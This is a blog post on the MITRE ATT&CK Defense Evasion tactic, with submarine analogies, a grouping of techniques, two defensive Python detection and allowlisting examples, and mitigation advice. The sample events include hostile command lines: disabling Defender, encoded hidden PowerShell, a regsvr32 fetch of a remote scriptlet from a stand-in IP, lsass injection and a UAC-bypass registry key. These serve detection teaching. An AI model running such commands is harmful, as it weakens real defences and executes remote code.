This, friends, is the Big Kahuna of tactics we’re talking about now! When I started writing this series of posts to discuss tactics, I feared the 7th tactic from the left. Why? Because we’re talking about the diverse and expansive ATT&CK Tactic of Defense Evasion. This brute contains a whopping 43 techniques and 155 sub-techniques. It is almost as if our adversaries really want to avoid detection or prevention and need options! Well, as this is so massive, we’re going to take a more holistic approach to this entry.

The importance of Defense Evasion

Defense evasion in any context is a group of techniques that allow one to hide, mask, or escape detection, capture, or confrontation. It can also include deception. Traditional warfare and cyberspace have their own versions, but the goal is the same: live to fight another day. In cyberspace these techniques are almost always associated with the attacker alone, whereas in traditional warfare every side may need them to avoid becoming a casualty.

Run silent, run deep

If you haven’t seen the classic movie “Run Silent, Run Deep” you are missing out! Clark Gable and Burt Lancaster were solid, but the secret weapon was Don Rickles ;). While the era was different from the one I served in, the TTPs were pretty similar. When I was stationed on submarines, we always wanted options to evade. Our best course of action was to avoid detection in the first place. For a submariner, evading detection came down to being quiet and hiding “under the noise floor”, outside of the range and threshold of sonar arrays and buoys. We used a lot of different methods to stay quiet:

  • Propellers were specially designed to avoid making noises that might give the boat away.
  • Our hulls were designed for minimal turbulence.
  • We had special mounts for everything.
  • Some submarines used special tiles.
  • Submariners wear sneakers underway, and take precautions to avoid slamming doors or dropping tools.
  • We used the quietest propulsion around (for us, nuclear, although new non-nuke boats have made huge leaps here!)

“Hey guys, did anyone figure out how to turn on Windows Event Logging? I could just ask the adversary to turn it on while they are in there…”

Now if we failed at that and were detected, our only options were to either hide better, quickly, or run like hell. And if they launched a torpedo, we had two options: launch a noisemaker and/or go all ahead flank, cavitate, making turns and depth changes in an effort to outrun our doom. Needless to say, we didn’t like the words “torpedo evasion” a whole lot.

While I was a member of the “senior stealth service”, I believe combat aircraft take similar approaches. A lot of effort and resources go into reducing the detectability of a particular aircraft: radar cross-section is a huge focus, but minimizing heat signature, reducing emissions, and allowing these aircraft to operate either above or below defenses is just as critical. Once detected, these aircraft can maneuver and attempt to outrun their opponents, and they carry jamming capabilities, flares, and chaff to distract or blind the sensors.

Threat Actors have their own flares, decoys, and chaff

Threat actors need to evade detection to ensure their attacks survive beyond initial access. The impact of an attack or breach is realized only when the adversary has time to reach the critical data, services, or devices and affect operations. Some of the techniques hide the activity altogether; others mask or disguise it. Obviously the gold standard is to lie low, but sometimes visibility is too pervasive to overcome, so threat actors pretend to be legitimate users and pass their payloads, scripts, or other tools off as benign. Sort of like locking onto a Star Destroyer and pretending to be trash prior to its jump to hyperspace.

APT28, like many venerable state-sponsored APTs, spends a lot of time on Defense Evasion. It must be worthwhile! (from https://ma-insights.vercel.app/adversaries)

At the extreme, these same adversaries launch their attacks knowing full well that they will be seen. A subset of the TTPs in Defense Evasion allow them to neutralize the protective action completely. In a harrowing scene in The Hunt for Red October, the Red October turns into the torpedo launched by the Soviet submarine Konovalov. Knowing the torpedo was fired with its safeties on, Ramius closes the distance so that it strikes the hull before it can arm, and it breaks up harmlessly on impact. Cyber adversaries do the same thing with the configuration of security tools, startup scripts, or the registry, and even turn those tools against other processes; in particular they exploit exclusions, which are a safety mechanism meant to keep the tool from acting on trusted paths and processes. Increasingly we see threat actors disable the detection and prevention tools altogether.

Defense Evasion: throwing the defenders off the scent

The 43 techniques and 155 sub-techniques in Defense Evasion (TA0005) are focused on three main areas: impacting security tools, obfuscating actions, and hijacking or piggybacking on legitimate processes. I took a crack at sorting them into those three categories here.

Impacting Security Tools
  • Impair Defenses (T1562)
  • Disable or Modify Tools (T1562.001)
  • Disable or Modify Cloud Logs (T1562.008)
  • Indicator Blocking (T1562.006)
  • Rootkit (T1014)
  • Modify Registry (T1112)
  • Process Injection (T1055)
  • Subvert Trust Controls (T1553)

Obfuscating Actions
  • Binary Padding (T1027.001)
  • Software Packing (T1027.002)
  • Obfuscated Files or Information (T1027)
  • Rootkit (T1014)
  • HTML Smuggling (T1027.006)
  • Indicator Removal from Tools (T1027.005)
  • Modify Cloud Compute Infrastructure (T1578)
  • Masquerading (T1036)

Hijacking or Piggybacking on Legitimate Processes
  • Process Hollowing (T1055.012)
  • Process Doppelgänging (T1055.013)
  • Trusted Developer Utilities Proxy Execution (T1127)
  • Hijack Execution Flow (T1574)
  • DLL Side-Loading (T1574.002)
  • Dylib Hijacking (T1574.004)
  • Executable Installer File Permissions Weakness (T1574.005)
  • Services File Permissions Weakness (T1574.010)
  • Process Injection (T1055)
  • System Binary Proxy Execution (T1218)
  • Rundll32 (T1218.011)
  • Template Injection (T1221)
ATT&CK TTPs for Defense Evasion run the gamut, but ChatGPT and I settled on this sorting. We duked it out, but you get the idea 😉

This categorization is somewhat subjective, and the techniques can overlap categories depending on their specific use. In any case, look for these to be blended with other Tactics, as they go hand in hand. You don’t rob a bank and disguise yourself separately; you disguise yourself while robbing a bank. So I am told. Below is an example of Carbanak using UAC bypass to evade detection and execute mimikatz.

Think of Defense Evasion as a super important add-on to almost any step an adversary takes inside a target environment. Carbanak uses UAC bypass in multiple steps to ensure the action is taken.
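To make the three buckets concrete (and to show what the UAC bypass in the Carbanak figure looks like from the defender's side), here is an added example of mine, not code from the original post or from any ATT&CK tooling: a small Python rule set that runs over a handful of constructed Sysmon and Windows Defender event records and tags each hit with the bucket and technique ID it belongs to. The field names (Image, CommandLine, TargetObject, ImageLoaded, SourceImage/TargetImage, Signed), Sysmon event IDs 1, 7, 8 and 13, and Defender operational-log event IDs 5001/5007 are the real ones; the records themselves, the user paths, the SID and the 192.0.2.10 address are constructed. The ms-settings handler key in the last rule is the one rewritten by the widely documented fodhelper.exe UAC bypass, used here as a generic indicator for T1548.002, not as a claim about Carbanak's actual procedure.

```python
"""Sort constructed endpoint events into the three Defense Evasion buckets above.
Added example, not from the original post. Field names follow Sysmon and the
Defender operational log; SAMPLE_EVENTS is constructed, not captured telemetry."""
import re
from dataclasses import dataclass
from typing import Callable, List

SYSMON = "Microsoft-Windows-Sysmon"
DEFENDER = "Microsoft-Windows-Windows Defender"
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
WINDOWS_BINARIES = {"svchost.exe", "lsass.exe", "explorer.exe", "csrss.exe"}
PROXY_BINARIES = {"rundll32.exe", "regsvr32.exe", "mshta.exe"}
# Handler key rewritten by the widely documented fodhelper.exe UAC bypass.
UAC_HANDLER_KEY = "\\classes\\ms-settings\\shell\\open\\command"

@dataclass(frozen=True)
class Rule:
    bucket: str      # table heading
    technique: str   # ATT&CK ID
    name: str
    match: Callable[[dict], bool]

def _base(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def _dirname(path: str) -> str:
    return path.rsplit("\\", 1)[0].lower()

def _in_system_dir(path: str) -> bool:
    return path.lower().startswith(SYSTEM_DIRS)

def _is(e: dict, provider: str, event_id: int) -> bool:
    return e.get("Provider") == provider and e.get("EventID") == event_id

def _has(pattern: str, text: str) -> bool:
    return re.search(pattern, text, re.I) is not None

RULES = [
    # Impacting security tools
    Rule("Impacting Security Tools", "T1562.001", "Defender real-time protection disabled",
         lambda e: _is(e, DEFENDER, 5001)),
    Rule("Impacting Security Tools", "T1562.001", "Defender exclusion added",
         lambda e: _is(e, DEFENDER, 5007) and "\\Exclusions\\" in e.get("Message", "")),
    Rule("Impacting Security Tools", "T1562.001", "Set-MpPreference used to weaken Defender",
         lambda e: _is(e, SYSMON, 1) and _has(r"set-mppreference.*-(disable\w+|exclusion\w+)", e.get("CommandLine", ""))),
    Rule("Impacting Security Tools", "T1112", "Defender policy key set in registry",
         lambda e: _is(e, SYSMON, 13) and "\\windows defender\\disableantispyware" in e.get("TargetObject", "").lower()),
    # Obfuscating actions
    Rule("Obfuscating Actions", "T1027", "Encoded PowerShell command line",
         lambda e: _is(e, SYSMON, 1) and _base(e.get("Image", "")) in {"powershell.exe", "pwsh.exe"}
         and _has(r"\s-(e|ec|enc|encodedcommand)\s", e.get("CommandLine", ""))),
    Rule("Obfuscating Actions", "T1036", "System binary name running outside a system directory",
         lambda e: _is(e, SYSMON, 1) and _base(e.get("Image", "")) in WINDOWS_BINARIES
         and not _in_system_dir(e.get("Image", ""))),
    # Hijacking or piggybacking on legitimate processes
    Rule("Hijacking or Piggybacking", "T1218", "Signed proxy binary pulling remote content",
         lambda e: _is(e, SYSMON, 1) and _base(e.get("Image", "")) in PROXY_BINARIES
         and _has(r"https?://", e.get("CommandLine", ""))),
    Rule("Hijacking or Piggybacking", "T1055", "Remote thread created in another process",
         lambda e: _is(e, SYSMON, 8) and _base(e.get("SourceImage", "")) != _base(e.get("TargetImage", ""))),
    Rule("Hijacking or Piggybacking", "T1574.002", "Unsigned DLL loaded from the executable's own directory",
         lambda e: _is(e, SYSMON, 7) and e.get("Signed", "true").lower() == "false"
         and not _in_system_dir(e.get("ImageLoaded", ""))
         and _dirname(e.get("ImageLoaded", "")) == _dirname(e.get("Image", ""))),
    Rule("Hijacking or Piggybacking", "T1548.002", "Auto-elevating handler key hijacked (UAC bypass)",
         lambda e: _is(e, SYSMON, 13) and UAC_HANDLER_KEY in e.get("TargetObject", "").lower()),
]

def detect(events: List[dict]) -> List[dict]:
    """One hit per (event, rule) pair; a single event may land in several buckets."""
    return [{"record": e.get("RecordId"), "bucket": r.bucket, "technique": r.technique, "name": r.name}
            for e in events for r in RULES if r.match(e)]

PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
TMP = "C:\\Users\\bob\\AppData\\Local\\Temp\\"
SAMPLE_EVENTS = [  # constructed records; 192.0.2.10 is a documentation address
    {"RecordId": 1, "Provider": SYSMON, "EventID": 1, "Image": PS,
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIAA="},
    {"RecordId": 2, "Provider": SYSMON, "EventID": 1, "Image": PS,
     "CommandLine": "powershell.exe -Command \"Set-MpPreference -DisableRealtimeMonitoring $true\""},
    {"RecordId": 3, "Provider": DEFENDER, "EventID": 5007,
     "Message": "Configuration changed. New value: HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\C:\\Users\\Public = 0x0"},
    {"RecordId": 4, "Provider": SYSMON, "EventID": 13, "Details": "DWORD (0x00000001)",
     "TargetObject": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\DisableAntiSpyware"},
    {"RecordId": 5, "Provider": SYSMON, "EventID": 1, "Image": "C:\\Users\\Public\\svchost.exe", "CommandLine": "svchost.exe"},
    {"RecordId": 6, "Provider": SYSMON, "EventID": 1, "Image": "C:\\Windows\\System32\\regsvr32.exe",
     "CommandLine": "regsvr32.exe /s /n /u /i:http://192.0.2.10/a.sct scrobj.dll"},
    {"RecordId": 7, "Provider": SYSMON, "EventID": 8, "SourceImage": TMP + "update.exe",
     "TargetImage": "C:\\Windows\\System32\\lsass.exe"},
    {"RecordId": 8, "Provider": SYSMON, "EventID": 7, "Image": TMP + "vendor-tool.exe",
     "ImageLoaded": TMP + "version.dll", "Signed": "false"},
    {"RecordId": 9, "Provider": SYSMON, "EventID": 13, "Details": "",
     "TargetObject": "HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Classes\\ms-settings\\Shell\\Open\\command\\DelegateExecute"},
    {"RecordId": 10, "Provider": SYSMON, "EventID": 1, "Image": "C:\\Windows\\System32\\svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs -p"},  # benign: real svchost from System32
]
```

Each constructed record trips exactly one rule here, but that is a property of the sample, not of the engine: real telemetry routinely lights up two buckets at once (an encoded PowerShell one-liner that also turns off real-time protection), which is the blending with other tactics described above. The rules are deliberately coarse; in production each would carry allowlists for the legitimate cases (installers that add exclusions, EDR agents that create remote threads).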

How do defenders avoid being duped?

The sheer number of techniques and procedures in the Defense Evasion tactic make a short discussion of detection (a.k.a. Data Sources) and mitigations impossible. But that doesn’t mean we cannot try! Here are some of the top recurring mitigation themes in ATT&CK for these TTPs:

  1. Privileged Account Management: Least Privilege is super helpful here, folks!
  2. Execution Prevention: Allowlisting or ExPrev engines are a must – any EDR/EPP needs to have those enabled.
  3. Software Restriction Policies: code-signing, approved packages, file integrity, and user/executable policy mapping prevent a wide variety of the obfuscation and hijacking TTPs.
  4. User Account Control: UAC gets a bad rap, but the frustration is a small hassle compared to the reduced risk.
  5. Log and Audit: Collect and monitor logs, folks! The OS is talking – are you listening?
  6. Behavior Prevention on Endpoint: Much like ExPrev above, but with more fuzzy math to anticipate new things.
  7. Restrict File and Directory Permissions: It gets much harder on bad guys when we keep them hemmed into tight spots.
  8. Multi-factor Authentication: MFA does not stop a payload that is already running, but many of the TTPs in this realm depend on reusing stolen credentials to move and persist, and MFA interrupts that. Balance is key, but it is worth some friction in the experience to ensure only legitimate users are involved.
  9. Update Software: Keep all software up to date, including operating systems and applications, to mitigate the exploitation of known vulnerabilities.
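Mitigations 2, 3 and 7 reinforce each other, and the way they layer is easier to see in code than in prose. The following is an added example (mine, not the author's, and not AppLocker's or any vendor's implementation) that models that layering in Python: a hash allowlist, a publisher rule that only trusts a signature when the binary sits in a directory ordinary users cannot write to, and a masquerading check on the name. The publisher names, file contents, hashes and launch records are constructed, and signature verification is stood in for by a signer field supplied with each record; a real policy engine would verify the Authenticode chain itself.

```python
"""Layered execution-prevention policy, modelled in Python.
Added example, not from the original post. The 'signer' field stands in for real
Authenticode verification; all names, contents and hashes are constructed."""
import hashlib
from dataclasses import dataclass, field
from typing import List, Optional

# Directories ordinary users cannot write to (the default path rules of an
# AppLocker-style policy); a trusted signature only counts from here.
PROTECTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
# Hypothetical publisher names the policy trusts.
TRUSTED_PUBLISHERS = {"Microsoft Windows", "Example Vendor Ltd"}
# Core binaries whose names adversaries like to borrow (Masquerading, T1036).
SYSTEM_NAMES = {"lsass.exe", "svchost.exe", "csrss.exe", "winlogon.exe"}


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Approved but unsigned tools are admitted by hash; the content is constructed.
HASH_ALLOWLIST = {sha256_hex(b"approved-unsigned-admin-tool-v1.4")}


@dataclass
class Launch:
    image: str                           # full path the process started from
    content: bytes                       # file bytes, so the hash is computed here
    signer: Optional[str] = None         # verified publisher name, None if unsigned
    original_name: Optional[str] = None  # PE OriginalFileName resource, if present


@dataclass
class Verdict:
    allow: bool
    reason: str
    flags: List[str] = field(default_factory=list)


def _base(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _protected(path: str) -> bool:
    return path.lower().startswith(PROTECTED_DIRS)


def evaluate(launch: Launch) -> Verdict:
    flags: List[str] = []
    name = _base(launch.image)
    # Masquerading checks: the version resource disagrees with the on-disk
    # name, or a core system name turns up outside a protected directory.
    if launch.original_name and launch.original_name.lower() != name:
        flags.append(f"name-mismatch:{launch.original_name.lower()}")
    if name in SYSTEM_NAMES and not _protected(launch.image):
        flags.append("system-name-outside-protected-dir")
    # Layer 1: an explicit hash match admits the file regardless of path or signature.
    if sha256_hex(launch.content) in HASH_ALLOWLIST:
        return Verdict(True, "hash-allowlist", flags)
    # Layer 2: a trusted publisher counts only from a protected directory. The
    # same signed binary copied into Temp is the side-loading/proxy pattern.
    if launch.signer in TRUSTED_PUBLISHERS:
        if _protected(launch.image):
            return Verdict(True, f"publisher:{launch.signer}", flags)
        return Verdict(False, "trusted-signer-in-unprotected-dir", flags)
    # Default deny: unsigned or untrusted signer, and no hash rule.
    return Verdict(False, "no-matching-rule", flags)


def evaluate_all(launches: List[Launch]) -> List[Verdict]:
    return [evaluate(launch) for launch in launches]


TEMP = "C:\\Users\\bob\\AppData\\Local\\Temp\\"
SAMPLE_LAUNCHES = [  # constructed launch records
    Launch("C:\\Program Files\\Example Vendor\\tool.exe", b"vendor-tool-bytes", "Example Vendor Ltd", "tool.exe"),
    Launch(TEMP + "tool.exe", b"vendor-tool-bytes", "Example Vendor Ltd", "tool.exe"),
    Launch("C:\\Users\\bob\\tools\\admintool.exe", b"approved-unsigned-admin-tool-v1.4", None, "admintool.exe"),
    Launch("C:\\Users\\Public\\lsass.exe", b"credential-dumper-bytes", None, "dumper.exe"),
    Launch("C:\\Users\\bob\\Downloads\\invoice.exe", b"dropper-bytes", "Totally Legit Signer", "invoice.exe"),
]

if __name__ == "__main__":
    for launch, verdict in zip(SAMPLE_LAUNCHES, evaluate_all(SAMPLE_LAUNCHES)):
        print("ALLOW" if verdict.allow else "DENY ", verdict.reason, verdict.flags, launch.image)
```

The second and fourth records are the ones worth studying: the same vendor-signed binary that is allowed from Program Files is denied from Temp, because a valid signature says who built the file, not whether it belongs where it is running; and the lsass.exe look-alike is denied by default but also carries two masquerading flags, which is the detection signal you want surfaced even when prevention already did its job.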

Once you have built a threat picture, it is worth looking at the recommendations that fall out of your tailored analysis. Most folks will find the above gives them a really good start!

Conclusion

Defense Evasion is dirty pool, as my old bartending colleagues used to call it. It doesn’t just rely on gaming the system, but on breaking it. During postmortems, defense evasion is often the tactic that causes the most embarrassment. When military units pull it off, historians write about the sheer skill of the adversary and the gullibility of the duped, but the truth is that there are a lot of factors in play. Defense Evasion, much like Persistence and Execution, happens alongside other tactics. It is the smokescreen under which the adversary moves through the system, disrupts a service, or exfiltrates critical data.

While evasion occurs on both the defensive and offensive side of a traditional engagement, in cyberspace it is the adversary who more often uses these techniques. In either case, mitigating that risk depends on vigilant use of multiple detection methods. Bringing multiple sensors to bear on the same vector makes it much harder for an adversary to hide, evade, or dupe us. The parallels are uncanny: submarines fear one adversary, but having an entire carrier battle group chase you down is downright mortifying. The spread and complementary diversity of sensors make it so much harder to hide.

Hopefully this post has been helpful, and I look forward to any feedback or conversation this might spark!